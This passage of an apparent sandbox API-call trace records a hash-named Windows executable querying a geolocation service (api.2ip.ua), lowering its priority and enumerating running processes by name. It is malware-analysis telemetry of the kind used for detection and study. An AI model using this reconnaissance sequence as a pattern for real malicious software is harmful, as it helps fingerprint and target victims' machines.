cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0079.372] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x16) returned 0x5f1788 [0079.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x5f1788, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 22 [0079.373] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1870) returned 0x80 [0079.373] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1870, Size=0x84) returned 0x5f1870 [0079.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0079.373] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x13) returned 0x5f17a8 [0079.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x5f17a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=kEecfMwgj", lpUsedDefaultChar=0x0) returned 19 [0079.373] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1870) returned 0x84 [0079.373] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1870, Size=0x88) returned 0x5f1870 [0079.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0079.373] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1f) returned 0x5eec10 [0079.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x5eec10, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 31 [0079.373] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1870) returned 0x88 [0079.373] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1870, Size=0x8c) returned 0x5f1870 [0079.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0079.373] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x5f17c8 [0079.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x5f17c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0079.373] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1870) returned 0x8c [0079.373] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1870, Size=0x90) returned 0x5f1870 [0079.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0079.373] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x5f1908 [0079.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x5f1908, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0079.373] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1870) returned 0x90 [0079.373] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1870, Size=0x94) returned 0x5f1928 [0079.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0079.373] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x46) returned 0x5e6e80 [0079.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x5e6e80, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0079.374] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1928) returned 0x94 [0079.374] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1928, Size=0x98) returned 0x5f1928 [0079.417] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f0e70) returned 0x80 [0079.417] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f0e70) returned 0x80 [0079.418] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f0e70) returned 0x80 [0079.443] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8ec) returned 0x5f19c8 [0079.443] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f0e70) returned 0x80 [0079.443] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e3208 [0079.444] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f0e70) returned 0x80 [0079.444] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f0e70) returned 0x80 [0079.444] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f0e70) returned 0x80 [0079.466] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f0e70) returned 0x80 [0079.493] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0080.912] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40) returned 0x5e2790 [0080.923] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0090.031] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18c1c8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e9c8 | out: lpBuffer=0x18c1c8*, lpdwNumberOfBytesRead=0x18e9c8*=0x22a) returned 1 [0090.031] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0090.031] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0090.039] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20) returned 0x5f8690 [0090.052] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x240) returned 0x2b11bc8 [0090.064] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b11bc8 | out: hHeap=0x5d0000) returned 1 [0090.064] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5f8690 | out: hHeap=0x5d0000) returned 1 [0090.065] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e2790 | out: hHeap=0x5d0000) returned 1 [0090.071] GetCurrentProcess () returned 0xffffffff [0090.071] GetLastError () returned 0x0 [0090.071] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0090.082] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6073f8 [0090.105] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8ec) returned 0x2b014e8 [0090.111] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x800) returned 0x60c328 [0090.111] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x60c328, nSize=0x400 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x5f [0090.111] PathRemoveFileSpecW (in: pszPath="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\Desktop") returned 1 [0090.130] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x810) returned 0x2b01de0 [0090.130] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" " [0090.130] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" ", pNumArgs=0x18eaa8 | out: pNumArgs=0x18eaa8) returned 0x6a22b0*="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0090.131] lstrcpyW (in: lpString1=0x18f738, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0090.143] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" " [0090.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" ", pNumArgs=0x18ea44 | out: pNumArgs=0x18ea44) returned 0x6a22b0*="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0090.143] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned="12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0090.143] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x752b0000 [0090.144] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcesses") returned 0x0 [0090.144] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcessModules") returned 0x0 [0090.144] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleBaseNameW") returned 0x0 [0090.144] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x75950000 [0090.251] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcesses") returned 0x75951544 [0090.252] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcessModules") returned 0x75951408 [0090.252] GetProcAddress (hModule=0x75950000, lpProcName="GetModuleBaseNameW") returned 0x7595152c [0090.252] EnumProcesses (in: lpidProcess=0x184240, cb=0xa000, lpcbNeeded=0x18ea50 | out: lpidProcess=0x184240, lpcbNeeded=0x18ea50) returned 1 [0090.264] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0090.265] CloseHandle (hObject=0x0) returned 0 [0090.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0090.265] CloseHandle (hObject=0x0) returned 0 [0090.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x0 [0090.265] CloseHandle (hObject=0x0) returned 0 [0090.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0090.265] CloseHandle (hObject=0x0) returned 0 [0090.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x0 [0090.265] CloseHandle (hObject=0x0) returned 0 [0090.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x0 [0090.265] CloseHandle (hObject=0x0) returned 0 [0090.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1a8) returned 0x0 [0090.265] CloseHandle (hObject=0x0) returned 0 [0090.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0090.265] CloseHandle (hObject=0x0) returned 0 [0090.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0090.265] CloseHandle (hObject=0x0) returned 0 [0090.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0090.265] CloseHandle (hObject=0x0) returned 0 [0090.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0090.265] CloseHandle (hObject=0x0) returned 0 [0090.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0090.266] CloseHandle (hObject=0x0) returned 0 [0090.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0090.266] CloseHandle (hObject=0x0) returned 0 [0090.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0090.266] CloseHandle (hObject=0x0) returned 0 [0090.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0090.266] CloseHandle (hObject=0x0) returned 0 [0090.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0090.266] CloseHandle (hObject=0x0) returned 0 [0090.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0090.266] CloseHandle (hObject=0x0) returned 0 [0090.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x0 [0090.266] CloseHandle (hObject=0x0) returned 0 [0090.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x474) returned 0x4e8 [0090.266] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0090.267] CloseHandle (hObject=0x4e8) returned 1 [0090.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x494) returned 0x0 [0090.267] CloseHandle (hObject=0x0) returned 0 [0090.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x520) returned 0x0 [0090.267] CloseHandle (hObject=0x0) returned 0 [0090.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x558) returned 0x0 [0090.267] CloseHandle (hObject=0x0) returned 0 [0090.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x770) returned 0x4e8 [0090.267] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0090.267] CloseHandle (hObject=0x4e8) returned 1 [0090.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x77c) returned 0x4e8 [0090.267] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0090.267] CloseHandle (hObject=0x4e8) returned 1 [0090.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0090.267] CloseHandle (hObject=0x0) returned 0 [0090.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x0 [0090.268] CloseHandle (hObject=0x0) returned 0 [0090.268] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0090.268] CloseHandle (hObject=0x0) returned 0 [0090.268] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x0 [0090.268] CloseHandle (hObject=0x0) returned 0 [0090.268] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x648) returned 0x4e8 [0090.268] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.272] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xc00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0090.272] CloseHandle (hObject=0x4e8) returned 1 [0090.272] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x4e8 [0090.272] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.277] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xc00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0090.277] CloseHandle (hObject=0x4e8) returned 1 [0090.277] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x848) returned 0x0 [0090.277] CloseHandle (hObject=0x0) returned 0 [0090.278] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x948) returned 0x4e8 [0090.278] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.279] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1240000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="yet_career.exe") returned 0xe [0090.279] CloseHandle (hObject=0x4e8) returned 1 [0090.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x950) returned 0x4e8 [0090.279] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.280] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xeb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="death-consumer.exe") returned 0x12 [0090.281] CloseHandle (hObject=0x4e8) returned 1 [0090.281] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x958) returned 0x4e8 [0090.281] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.282] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x9b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="individual up.exe") returned 0x11 [0090.282] CloseHandle (hObject=0x4e8) returned 1 [0090.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x960) returned 0x4e8 [0090.282] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.283] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xd50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="most.exe") returned 0x8 [0090.284] CloseHandle (hObject=0x4e8) returned 1 [0090.284] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x968) returned 0x4e8 [0090.284] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.285] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xf20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="someone face among.exe") returned 0x16 [0090.285] CloseHandle (hObject=0x4e8) returned 1 [0090.285] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x970) returned 0x4e8 [0090.285] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.287] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xd50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="add.exe") returned 0x7 [0090.287] CloseHandle (hObject=0x4e8) returned 1 [0090.287] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x978) returned 0x4e8 [0090.287] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.288] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x110000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="through anyone.exe") returned 0x12 [0090.289] CloseHandle (hObject=0x4e8) returned 1 [0090.289] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x980) returned 0x4e8 [0090.289] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.290] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb30000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="soldier.exe") returned 0xb [0090.291] CloseHandle (hObject=0x4e8) returned 1 [0090.291] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x988) returned 0x4e8 [0090.291] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.292] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa80000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="during present military.exe") returned 0x1b [0090.292] CloseHandle (hObject=0x4e8) returned 1 [0090.293] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x990) returned 0x4e8 [0090.293] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.294] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x2c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="patientsummersometimes.exe") returned 0x1a [0090.294] CloseHandle (hObject=0x4e8) returned 1 [0090.294] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x998) returned 0x4e8 [0090.294] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.295] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xbb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="security_role.exe") returned 0x11 [0090.296] CloseHandle (hObject=0x4e8) returned 1 [0090.296] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a0) returned 0x4e8 [0090.296] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.297] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x3d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="better apply patient.exe") returned 0x18 [0090.297] CloseHandle (hObject=0x4e8) returned 1 [0090.297] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d0) returned 0x4e8 [0090.297] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.298] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1250000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="one.exe") returned 0x7 [0090.299] CloseHandle (hObject=0x4e8) returned 1 [0090.299] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x4e8 [0090.299] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.300] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x2d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="note.exe") returned 0x8 [0090.300] CloseHandle (hObject=0x4e8) returned 1 [0090.300] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e8) returned 0x4e8 [0090.300] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.301] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x3e0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="shouldmake.exe") returned 0xe [0090.302] CloseHandle (hObject=0x4e8) returned 1 [0090.302] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x4e8 [0090.302] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.303] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x12c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="water.exe") returned 0x9 [0090.303] CloseHandle (hObject=0x4e8) returned 1 [0090.303] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa00) returned 0x4e8 [0090.303] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.304] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xbe0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="plant.exe") returned 0x9 [0090.305] CloseHandle (hObject=0x4e8) returned 1 [0090.305] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb60) returned 0x4e8 [0090.305] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.306] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xd50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0090.306] CloseHandle (hObject=0x4e8) returned 1 [0090.306] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb68) returned 0x4e8 [0090.306] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.308] GetModuleBaseNameW (in: 